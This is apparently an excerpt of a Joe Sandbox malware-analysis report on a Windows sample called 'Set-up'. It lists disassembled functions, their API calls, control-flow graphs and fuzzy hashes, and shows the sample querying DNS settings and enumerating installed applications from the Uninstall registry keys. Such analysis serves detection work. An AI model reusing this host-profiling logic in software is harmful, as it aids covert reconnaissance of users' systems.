                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                                • String ID:
                                • API String ID: 2715571461-0
                                • Opcode ID: d2f0c65ffccac2e7b750ffa9f097b61429d2cb28b043970ec7c32e888e1ac835
                                • Instruction ID: a58a3fd9a06267df398758df35d859248dd533b7c050d80e4f164c9bc79f69da
                                • Opcode Fuzzy Hash: d2f0c65ffccac2e7b750ffa9f097b61429d2cb28b043970ec7c32e888e1ac835
                                • Instruction Fuzzy Hash: 8F4138B0904705DFDB18EFA9D99139DBBF0BB95304F10493EEA84A7351DB749884CB42
                                Function 00111160 Relevance: 10.6, APIs: 7, Instructions: 131sleepstringCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32 ref: 001111B7
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00111238
                                • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011124D
                                • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00111261
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                • GetStartupInfoA.KERNEL32 ref: 00111433
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                                • String ID:
                                • API String ID: 3873122205-0
                                • Opcode ID: 7a4b9b5e04021e9b9678ac9fa90e740cd7538000f1f1fb20b3051b5596eb9fae
                                • Instruction ID: 0ec53d7942ee44b8d2d97434bd5a2cb3fe622b5b211ecb8c8fe6729929e097fb
                                • Opcode Fuzzy Hash: 7a4b9b5e04021e9b9678ac9fa90e740cd7538000f1f1fb20b3051b5596eb9fae
                                • Instruction Fuzzy Hash: 4A516A71A04744DFDB18DFA9D99079ABBF0FB99304F10493DEA44AB361D734A880CB82
                                Function 001DA870 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                                Download Yara Rule
                                APIs
                                • recv.WS2_32(000000FF,001C6F4E,000000FF,00000000), ref: 001DA8AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: recv
                                • String ID:
                                • API String ID: 1507349165-0
                                • Opcode ID: f69e1454384c90c5c029fc5825064191f0af40c3c4743f0fe6da407a71d01b31
                                • Instruction ID: 10de9f3cbf1400d8d0e708565dfda7b4ecd833c38b8d4eb3a74803c1296f331c
                                • Opcode Fuzzy Hash: f69e1454384c90c5c029fc5825064191f0af40c3c4743f0fe6da407a71d01b31
                                • Instruction Fuzzy Hash: AFF01C72B047206BD624CA18EC05F9BF369EBC4B21F148909B954673488370BC118BE2
                                Function 001CA440 Relevance: 97.3, APIs: 43, Strings: 12, Instructions: 1038registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 001CA499
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 001CA4FB
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 001CA531
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 001CAA19
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 001CAA4C
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 001CAA97
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 001CAAE9
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 001CAB30
                                • RegCloseKey.KERNELBASE(?), ref: 001CAB6A
                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 001CAB82
                                • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 001CABAD
                                • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 001CABF0
                                • RegCloseKey.ADVAPI32(?), ref: 001CAC2A
                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 001CAC46
                                • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 001CAC71
                                • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 001CACB4
                                • RegCloseKey.ADVAPI32(?), ref: 001CACEE
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 001CAD0A
                                • RegEnumKeyExA.KERNELBASE ref: 001CAD8D
                                • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 001CADB0
                                • RegCloseKey.KERNELBASE(?), ref: 001CADD9
                                • RegEnumKeyExA.KERNELBASE ref: 001CAE08
                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 001CAE2A
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 001CAE54
                                • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 001CAEA3
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 001CAF18
                                • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 001CAF2C
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 001CAF63
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 001CAFB2
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 001CB027
                                • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 001CB03B
                                • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 001CB072
                                • RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 001CB0C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u$xc$|c
                                • API String ID: 1856363200-2353712586
                                • Opcode ID: 0521b5f127a404f870911884453399642ca1a464d4bf958dca326cca2b1ec62b
                                • Instruction ID: 92dd3500b53814545fda7b1bf8569e967683622ebead8246dc2d3ca3427b98ee
                                • Opcode Fuzzy Hash: 0521b5f127a404f870911884453399642ca1a464d4bf958dca326cca2b1ec62b
                                • Instruction Fuzzy Hash: C782ADB1608305AFE3218B24DC86F6B7BE8EF95704F54482CF985D72A1E774E944CB92
                                Function 001D9740 Relevance: 32.2, APIs: 12, Strings: 6, Instructions: 736registrystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 582 1d9740-1d975b 583 1d975d-1d9768 call 1d78a0 582->583 584 1d9780-1d9782 582->584 592 1d976e-1d9770 583->592 593 1d99bb-1d99c0 583->593 586 1d9788-1d97a0 getenv call 1d78a0 584->586 587 1d9914-1d994e memset RegOpenKeyExA 584->587 586->593 597 1d97a6-1d97c5 _stat64 586->597 589 1d995a-1d99ab RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen call 1d78a0 587->589 590 1d9950-1d9955 587->590 599 1d99b0-1d99b5 589->599 595 1d9a0c-1d9a15 590->595 592->597 598 1d9772-1d977e 592->598 593->595 600 1d9827-1d9833 597->600 601 1d97c7-1d97e0 597->601 598->586 599->593 599->597 602 1d985f-1d9872 call 1d5ca0 600->602 603 1d9835-1d985c call 1ce2b0 * 2 600->603 605 1d97f6-1d9809 _stricmp 601->605 606 1d97e2-1d97f3 _time64 601->606 613 1d9878-1d987d call 1d77b0 602->613 614 1d99f0 602->614 603->602 605->600 608 1d980b-1d9810 605->608 606->605 608->600 610 1d9812-1d9822 608->610 610->595 619 1d9882-1d9889 613->619 617 1d99f5-1d99fb call 1d5d00 614->617 626 1d99fe-1d9a09 617->626 619->617 622 1d988f-1d989b call 1c4fe0 619->622 622->614 629 1d98a1-1d98c3 _time64 call 1d78a0 622->629 626->595 633 1d98c9-1d98db call 1ce2d0 629->633 634 1d99c2-1d99ed call 1ce2b0 * 2 629->634 633->634 638 1d98e1-1d98f0 call 1ce2d0 633->638 634->614 638->634 644 1d98f6-1d9905 call 1d63f0 638->644 649 1d990b-1d990f 644->649 650 1d9f66-1d9f7f call 1d5d00 644->650 651 1d9a3f-1d9a5a call 1d6740 call 1d63f0 649->651 650->626 651->650 658 1d9a60-1d9a6e call 1d6d60 651->658 661 1d9a1f-1d9a39 call 1d6840 call 1d63f0 658->661 662 1d9a70-1d9a94 call 1d6200 call 1d67e0 call 1d6320 658->662 661->650 661->651 673 1d9a16-1d9a19 662->673 674 1d9a96-1d9ac6 call 1cd120 662->674 673->661 675 1d9fc1 673->675 679 1d9ac8-1d9adb call 1cd120 674->679 680 1d9ae1-1d9af7 call 1cd190 674->680 678 1d9fc5-1d9ffd call 1d5d00 call 1ce2b0 * 2 675->678 678->626 679->661 679->680 680->661 687 1d9afd-1d9b09 call 1c4fe0 680->687 687->675 693 1d9b0f-1d9b29 call 1ce730 687->693 699 1d9b2f-1d9b3a call 1d78a0 693->699 700 1d9f84-1d9f88 693->700 699->700 706 1d9b40-1d9b54 call 1ce760 699->706 701 1d9f95-1d9f99 700->701 703 1d9f9b-1d9f9e 701->703 704 1d9fa0-1d9fb6 call 1cebf0 * 2 701->704 703->675 703->704 715 1d9fb7-1d9fbe 704->715 712 1d9f8a-1d9f92 706->712 713 1d9b5a-1d9b6e call 1ce730 706->713 712->701 720 1d9b8c-1d9b97 call 1d63f0 713->720 721 1d9b70-1da004 713->721 715->675 728 1d9b9d-1d9bbf call 1d6740 call 1d63f0 720->728 729 1d9c9a-1d9cab call 1cea00 720->729 724 1da015-1da01d 721->724 726 1da01f-1da022 724->726 727 1da024-1da045 call 1cebf0 * 2 724->727 726->678 726->727 727->678 728->729 745 1d9bc5-1d9bda call 1d6d60 728->745 737 1d9f31-1d9f35 729->737 738 1d9cb1-1d9ccd call 1cea00 call 1ce960 729->738 742 1d9f37-1d9f3a 737->742 743 1d9f40-1d9f61 call 1cebf0 * 2 737->743 757 1d9cfd-1d9d0e call 1ce960 738->757 758 1d9ccf 738->758 742->661 742->743 743->661 745->729 756 1d9be0-1d9bf4 call 1d6200 call 1d67e0 745->756 756->729 776 1d9bfa-1d9c0b call 1d6320 756->776 766 1d9d10 757->766 767 1d9d53-1d9d55 757->767 761 1d9cd1-1d9cec call 1ce9f0 call 1ce4a0 758->761 781 1d9cee-1d9cfb call 1ce9d0 761->781 782 1d9d47-1d9d51 761->782 771 1d9d12-1d9d2d call 1ce9f0 call 1ce4a0 766->771 770 1d9e69-1d9e8e call 1cea40 call 1ce440 767->770 794 1d9e94-1d9eaa call 1ce3c0 770->794 795 1d9e90-1d9e92 770->795 798 1d9d2f-1d9d3c call 1ce9d0 771->798 799 1d9d5a-1d9d6f call 1ce960 771->799 792 1d9b75-1d9b86 call 1cea00 776->792 793 1d9c11-1d9c1c call 1d7b70 776->793 781->757 781->761 784 1d9dca-1d9ddb call 1ce960 782->784 803 1d9ddd-1d9ddf 784->803 804 1d9e2e-1d9e36 784->804 792->720 816 1d9f2d 792->816 793->720 809 1d9c22-1d9c33 call 1ce960 793->809 822 1da04a-1da04c 794->822 823 1d9eb0-1d9eb1 794->823 805 1d9eb3-1d9ec4 call 1ce9c0 795->805 798->771 827 1d9d3e-1d9d42 798->827 819 1d9d71-1d9d73 799->819 820 1d9dc2 799->820 814 1d9e06-1d9e21 call 1ce9f0 call 1ce4a0 803->814 811 1d9e3d-1d9e5b call 1cebf0 * 2 804->811 812 1d9e38-1d9e3b 804->812 805->661 834 1d9eca-1d9ed0 805->834 837 1d9c35 809->837 838 1d9c66-1d9c75 call 1d78a0 809->838 824 1d9e5e-1d9e67 811->824 812->811 812->824 849 1d9de1-1d9dee call 1cec80 814->849 850 1d9e23-1d9e2c call 1ceac0 814->850 816->737 832 1d9d9a-1d9db5 call 1ce9f0 call 1ce4a0 819->832 820->784 828 1da04e-1da051 822->828 829 1da057-1da070 call 1cebf0 * 2 822->829 823->805 824->770 824->805 827->770 828->675 828->829 829->715 865 1d9d75-1d9d82 call 1cec80 832->865 866 1d9db7-1d9dc0 call 1ceac0 832->866 841 1d9ee5-1d9ef2 call 1ce9f0 834->841 845 1d9c37-1d9c51 call 1ce9f0 _stricmp 837->845 861 1d9c7b-1d9c8f call 1ce7c0 838->861 862 1da011 838->862 841->661 857 1d9ef8-1d9f0e call 1ce440 841->857 845->720 869 1d9c57-1d9c64 call 1ce9d0 845->869 874 1d9df1-1d9e04 call 1ce960 849->874 850->874 881 1d9f10-1d9f26 call 1ce3c0 857->881 882 1d9ed2-1d9edf call 1ce9e0 857->882 861->720 878 1d9c95-1da00e 861->878 862->724 886 1d9d85-1d9d98 call 1ce960 865->886 866->886 869->838 869->845 874->804 874->814 878->862 881->882 895 1d9f28 881->895 882->661 882->841 886->820 886->832 895->675
                                APIs
                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 001D978D
                                • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 001D97BA
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 001D97E4
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 001D98A5
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 001D9920
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 001D9946
                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 001D9974
                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 001D9981
                                • RegCloseKey.ADVAPI32(?), ref: 001D998B
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001D9992
                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 001D97FE
                                  • Part of subcall function 001D78A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,001DE16D,?), ref: 001D78AF
                                  • Part of subcall function 001D78A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 001D78D9
                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 001D9C46
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                • API String ID: 3843116398-615551945
                                • Opcode ID: 0c073fd3130010853fce49965007dcca5be45d4ee07ed466c8a54d52f7a18299
                                • Instruction ID: 727cae553831320607397427897ce4d3f91662d673bd152ffdc36fcc6c154229
                                • Opcode Fuzzy Hash: 0c073fd3130010853fce49965007dcca5be45d4ee07ed466c8a54d52f7a18299
                                • Instruction Fuzzy Hash: A13272B6904201ABEB11AB24EC42F2B77E9AF64318F084439F94996363F731ED15D793
                                Function 00112F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 987 112f17-112f8c call 633930 call 633d20 992 1131c9-1131cd 987->992 993 112f91-112ff4 call 111619 RegOpenKeyExA 992->993 994 1131d3-1131d6 992->994 997 1131c5 993->997 998 112ffa-11300b 993->998 997->992 999 11315c-1131ac RegEnumKeyExA 998->999 1000 113010-113083 call 111619 RegOpenKeyExA 999->1000 1001 1131b2-1131c2 999->1001 1005 113089-1130d4 RegQueryValueExA 1000->1005 1006 11314e-113152 1000->1006 1001->997 1007 1130d6-113137 call 633c00 call 633c90 call 633d20 call 633b30 call 633d20 call 632090 1005->1007 1008 11313b-11314b RegCloseKey 1005->1008 1006->999 1007->1008 1008->1006
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: EnumOpen
                                • String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
                                • API String ID: 3231578192-3120786300
                                • Opcode ID: d0f2ef00edcaabdc9ce51ce5068507efc8c3ecdd7c5ae3eecd98e6d99423a65b
                                • Instruction ID: 4f134a46c79b6275487f9f11f39a2e60a70f0c8f604ae6901bdaeea7439f5986
                                • Opcode Fuzzy Hash: d0f2ef00edcaabdc9ce51ce5068507efc8c3ecdd7c5ae3eecd98e6d99423a65b
                                • Instruction Fuzzy Hash: 4471A4B4904319DFDB50DF69D98479EBBF0BF84308F10886DE99897341E7749A888F92
                                Function 002EE5D0 Relevance: 19.6, APIs: 13, Instructions: 107filestringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1075 2ee5d0-2ee602 strlen MultiByteToWideChar 1076 2ee608 1075->1076 1077 2ee6b0-2ee6bb GetLastError 1075->1077 1078 2ee60f-2ee643 call 499f40 MultiByteToWideChar 1076->1078 1079 2ee6bd-2ee6d4 MultiByteToWideChar 1077->1079 1080 2ee6e2-2ee6f2 GetLastError 1077->1080 1082 2ee703-2ee70a 1078->1082 1086 2ee649-2ee66d strlen MultiByteToWideChar 1078->1086 1079->1080 1084 2ee6d6-2ee6dd 1079->1084 1081 2ee6f4-2ee6ff fopen 1080->1081 1080->1082 1081->1082 1084->1078 1087 2ee673-2ee683 _wfopen 1086->1087 1088 2ee701 1086->1088 1087->1082 1089 2ee685-2ee68e _errno 1087->1089 1088->1082 1090 2ee6a0-2ee6ae fopen 1089->1090 1091 2ee690-2ee69e _errno 1089->1091 1090->1082 1091->1082 1091->1090
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE5E2
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 002EE5FA
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 002EE637
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0027A31E), ref: 002EE64D
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0027A31E,00000001,?,00000008,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000), ref: 002EE665
                                • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE678
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE685
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE690
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0027A31E,?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E), ref: 002EE6A6
                                • GetLastError.KERNEL32(?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE6B0
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 002EE6CC
                                • GetLastError.KERNEL32(?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE6E2
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0027A31E,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE6FA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
